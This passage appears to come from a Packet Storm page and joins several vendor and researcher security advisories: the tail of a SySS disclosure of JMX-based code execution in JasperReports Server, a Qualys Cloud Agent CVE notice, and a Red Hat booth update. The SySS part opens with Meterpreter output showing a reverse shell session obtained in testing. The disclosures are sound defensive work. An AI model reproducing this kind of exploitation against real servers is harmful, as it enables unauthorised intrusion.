[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.106:46828) at 2022-06-09 13:39:40 +0200  
-------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Disable the JMX server as per documentation, as per section 9.12 of [6].  
Update to version 8.1.0 which disables the JMX service by default.  
Do not enable the Diagnostic JMX Server.

  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-08: Vulnerability discovered  
2022-06-10: Vulnerability reported to manufacturer  
2022-08-10: Patch released by manufacturer  
2022-09-09: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for JasperReports Server  
     https://community.jaspersoft.com/project/jasperreports-server  
[2] SySS Security Advisory SYSS-2022-041  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-041.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] TIBCO JasperReports Server Community Edition Release Notes  
     https://community.jaspersoft.com/documentation/tibco-jasperreports-server-community-edition-release-notes/v750/installation-and-basic  
[5] ysoserial  
     https://github.com/frohoff/ysoserial/  
[6] JasperReports Server Administrator Guide  
     https://docs.tibco.com/pub/js-jrs/8.0.2/doc/pdf/TIB_js-jrs_8.0.0_Admin-Guide.pdf?id=5

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Bechler of SySS GmbH.

E-Mail: moritz.bechler@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc  
Key ID: 0x768EFE2BB3E53DDA  
Key Fingerprint: 2C8F F101 9D77 BDE6 465E  CCC2 768E FE2B B3E5 3DDA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

TIBCO JasperReports Server 8.0.2 Community Edition Code Execution

The Unqork Security team discovered multiple security vulnerabilities in the Qualys Cloud Agent including arbitrary code execution.

    The Unqork Security team discovered multiple security vulnerabilities inthe Qualys Cloud Agent, to include arbitrary code execution.CVE-2022-29549 (Arbitrary Code Execution)https://nvd.nist.gov/vuln/detail/CVE-2022-29549CVE-2022-29550 (Sensitive Information Disclosure)https://nvd.nist.gov/vuln/detail/CVE-2022-29550Read more:https://www.unqork.com/resources/unqork-and-qualys-partner-to-resolve-zero-day-vulnerabilitieshttps://blog.qualys.com/product-tech/2022/08/15/qualys-security-updates-cloud-agent-for-linux

Qualys Cloud Agent Arbitrary Code Execution

Red Hat Security Advisory 2022-6439-01 - The Booth cluster ticket manager is a component to bridge high availability clusters spanning multiple sites, in particular, to provide decision inputs to local Pacemaker cluster resource managers. It operates as a distributed consensus-based service, presumably on a separate physical network. Tickets facilitated by a Booth formation are the units of authorization that can be bound to certain resources. This will ensure that the resources are run at only one site at a time.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: booth security update  
Advisory ID:       RHSA-2022:6439-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6439  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-2553  
====================================================================  
1. Summary:

An update for booth is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage (v. 8) - noarch, ppc64le, s390x, x86_64

3. Description:

The Booth cluster ticket manager is a component to bridge high availability  
clusters spanning multiple sites, in particular, to provide decision inputs  
to local Pacemaker cluster resource managers. It operates as a distributed  
consensus-based service, presumably on a separate physical network. Tickets  
facilitated by a Booth formation are the units of authorization that can be  
bound to certain resources. This will ensure that the resources are run at  
only one (granted) site at a time.

Security Fix(es):

* booth: authfile directive in booth config file is completely ignored.  
(CVE-2022-2553)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2109251 - CVE-2022-2553 booth: authfile directive in booth config file is completely ignored.

6. Package List:

Red Hat Enterprise Linux High Availability (v. 8):

Source:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.src.rpm

aarch64:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.aarch64.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.aarch64.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.aarch64.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.aarch64.rpm

noarch:  
booth-arbitrator-1.0-199.1.ac1d34c.git.el8_6.1.noarch.rpm  
booth-site-1.0-199.1.ac1d34c.git.el8_6.1.noarch.rpm  
booth-test-1.0-199.1.ac1d34c.git.el8_6.1.noarch.rpm

ppc64le:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm

s390x:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm

x86_64:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage (v. 8):

Source:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.src.rpm

noarch:  
booth-arbitrator-1.0-199.1.ac1d34c.git.el8_6.1.noarch.rpm  
booth-site-1.0-199.1.ac1d34c.git.el8_6.1.noarch.rpm  
booth-test-1.0-199.1.ac1d34c.git.el8_6.1.noarch.rpm

ppc64le:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.ppc64le.rpm

s390x:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.s390x.rpm

x86_64:  
booth-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm  
booth-core-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm  
booth-core-debuginfo-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm  
booth-debugsource-1.0-199.1.ac1d34c.git.el8_6.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2553  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCCANzjgjWX9erEAQgmDw/+LGjXrBm2PJZV3ZvzkgW4k35JQtPjeg2V  
QTWhHNBEhfCVCbjpTKixN4RDSYYvaI5iVMMLiPkwoRP766Us7kwTYeuWEnBxhEaP  
Ff8awUzdI96OFicainqx1/DD8V8QJ7yyBVC1UhdjoF5K5pMQ0Tnm7TSoM/6At/xo  
WUTuNOkE+sIqg9q8HvyPM6tAfPpqjCdUJKGUBPnQNuiX2VR+HIbtqYns8fNO9R+F  
RmN+zF//m5y9x5pucsum0suE9bhew6e0rLd7uYq/0xxtC0N++CtMDVKJpckj1jof  
EoSHv9wTSbhI7UrPThnmGOFIBysCxMwS69US7W15lBfwRdlTAemX4s03/YVYSWl3  
mtzFjGjpQZrJMbePCp6XNzHAi4S/l80w3yQhhj1UXNpq9t949/zEb7Rzhq1mZd8s  
UOK2ZC0RzFCfS8XgyHtEHWYrkoV2velBgVSSZjypqm3we3YH8IrWDCvKDrU7tDBu  
L3FNJlM3jhQWD5VQVtcyK5ec6k7mpw4XpCat5qpIKbgtDNs/uQS7RkR0MZFUq2gO  
ld63ntJSEz512dotgtutthWBZlT42lRvcbB+0H/pA8tLPX3oO2BUxAiC/iYp2UGk  
0A3ZVrrs4sOgQ05vTr1VV/heImoJUOI9uNDk7E5ZgUYxueEnqjkDyNqjfuDwdbBN  
QVeO1P1XOiI°k/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm